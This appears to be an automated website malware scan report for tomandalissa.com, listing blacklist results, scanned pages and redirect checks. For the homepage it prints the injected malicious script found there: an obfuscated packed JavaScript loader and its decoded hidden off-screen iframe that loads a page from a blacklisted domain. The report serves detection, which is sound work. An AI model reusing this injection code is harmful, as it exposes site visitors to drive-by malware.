Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tomandalissa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tomandalissa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tomandalissa.com/ | 200 OK Content-Length: 2825 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ajwcjwk.dns1.us eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2) ...[713 bytes skipped]... Decoded script: ...[1391 bytes skipped]... f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393870783b223e3c696672616d652077696474683d22323022206865696768743d22323022207372633d22687474703a2f2f616a77636a776b2e646e73312e75732f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'));document.cookie='cookieh=enabled'} <div style="position: absolute; left: -1993px; top: -2998px;"><iframe width="20" height="20" src="http://ajwcjwk.dns1.us/main.php?page=c69bd02e93e6957c"></iframe></div> | ||
http://www.tomandalissa.com/blog | 200 OK Content-Length: 1309 Content-Type: text/html | clean |
http://www.tomandalissa.com/test404page.js | 200 OK Content-Length: 1309 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tomandalissa.com
Result:
GET / HTTP/1.1
Host: tomandalissa.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tomandalissa.com
Referer: http://www.google.com/search?q=tomandalissa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tomandalissa.com
Referer: http://www.google.com/search?q=tomandalissa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.